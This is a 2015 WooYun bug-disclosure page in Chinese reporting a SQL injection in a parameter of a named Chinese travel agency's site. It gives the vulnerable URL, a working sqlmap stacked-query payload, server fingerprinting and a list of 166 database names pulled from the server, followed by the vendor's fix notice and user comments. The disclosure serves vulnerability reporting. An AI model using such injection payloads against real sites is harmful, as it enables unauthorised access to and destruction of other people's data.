当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116540

漏洞标题:中国国旅某站SQL注射大量数据库信息

相关厂商:中国国旅

漏洞作者: 路人甲

提交时间:2015-05-27 17:47

修复时间:2015-06-01 10:07

公开时间:2015-06-01 10:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经确认,细节仅向厂商公开
2015-06-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

233

详细说明:

王祖蓝 外号 捡漏王。哈哈
www.whcits.com/xianlu.aspx?id=04001425429&qu=1 
参数qu

漏洞证明:

---
Parameter: qu (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: id=04001425429&qu=1';IF(8611=8611) SELECT 8611 ELSE DROP FUNCTION YQBR--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [166]:
[*] 617857971
[*] [netbardata ]
[*] adaads
[*] Aiwida_Sys
[*] aoma
[*] bjhwly
[*] bjjiayuming
[*] bjjqkm
[*] bmnetcat
[*] cab520
[*] cdjyjt
[*] chuanglong
[*] crm
[*] csdz
[*] csmkdz
[*] cxavision
[*] cy86
[*] dahebj
[*] db_shijibet
[*] db_vristy
[*] diantong
[*] dingmaoxian
[*] diyan8
[*] dmsk
[*] dubin061
[*] eyway
[*] fanweiyang1
[*] glmidozhu
[*] gougoujessie
[*] gzmeiji
[*] gzzj
[*] hailang001
[*] hbzhiye
[*] hdsx
[*] hnshengyuan
[*] HoRen_Jumbot
[*] hsgjt
[*] huasusjy
[*] hzgamfe
[*] ieastboatcn
[*] jaylaji1
[*] jh2ndhsp
[*] jiaojun5426586
[*] JJXING
[*] jounchai
[*] jsaft
[*] jsptest001
[*] jx123
[*] jxcsn
[*] jxdzgjsql
[*] jzjzw
[*] kaidi2011
[*] kegang
[*] kegulianmeng
[*] ketest
[*] kimberley
[*] kjjg
[*] knifeqw
[*] koalamika
[*] ktpy
[*] kwhx
[*] laoqiu
[*] libangban
[*] lilyluo
[*] livingcs
[*] ljp
[*] longgujianzhu
[*] longriverhairs
[*] lovepetshsql
[*] lvlidong
[*] lxkidon88
[*] madanna870124
[*] magicmaow
[*] manokmee
[*] maolibo
[*] markxiao
[*] master
[*] mingjue
[*] model
[*] msdb
[*] mssqltest
[*] MyWebData
[*] nbwh86
[*] new
[*] ngarwah
[*] nnhhny
[*] oetchbj
[*] panet0
[*] panet1
[*] pengdan
[*] puhaotian
[*] qhfczx
[*] quanxin
[*] rcerp
[*] restaurantDB
[*] riderinfo1
[*] scott_leesky
[*] sestmssql2005
[*] SewXieHe
[*] sfyz
[*] shangyouhui
[*] shanzhaitechan
[*] shaodong
[*] shhs021
[*] shiweibh
[*] shuchong
[*] sizizi0109
[*] sjidiguo
[*] sleimn1
[*] songmrong
[*] sq_dmnj
[*] SuQing
[*] szhddx64776170
[*] tao2009
[*] teamkey
[*] temp
[*] tempdb
[*] test8017
[*] test8019
[*] test8021
[*] testmssql8017
[*] thlwpq_softlink
[*] tomiskii99
[*] tour268
[*] tuanpub
[*] twophoto
[*] tysteel
[*] vasun
[*] vasun_test
[*] vasunxk
[*] vasunyj
[*] vsung
[*] wando
[*] wang1370518
[*] wangjun2008
[*] wansui
[*] wanzaidao11
[*] wf47211013
[*] whoubo
[*] wm921
[*] wqgjzx1011
[*] wtx102
[*] wuhan80kongjian
[*] wuhancits
[*] wwlxz
[*] xiyavision
[*] xiziqian
[*] xlf1130
[*] xmhsql2005
[*] xq79
[*] xsnsql
[*] xtooso_cn
[*] xufei
[*] xx2hf
[*] yeelion
[*] yihanjie
[*] yimihy
[*] yuanyuanwang
[*] yuchen000
[*] yuxin
[*] ZECshop
[*] zhcct
[*] zhengfa
[*] zhengjian2011
[*] zjmtffy999
表太多

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-01 10:02

厂商回复:

非常感谢您的报告,问题已处理,十分感谢您对中国国旅的支持。

最新状态:

2015-06-01:已过滤

漏洞评价:

评论

  1. 2015-05-27 17:50 | secretsdigg ( 实习白帽子 | Rank:90 漏洞数:12 | foo)

    支付宝出什么问题了?

  2. 2015-05-27 17:59 | r3nty ( 路人 | Rank:2 漏洞数:3 )

    @secretsdigg 这个bug和支付宝有毛关系?

  3. 2015-06-01 10:43 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    为了这5rank,有必要么

  4. 2015-06-01 11:07 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @BMa 只能说希望这个厂,以后所有的洞走小厂。鄙视(#‵′)凸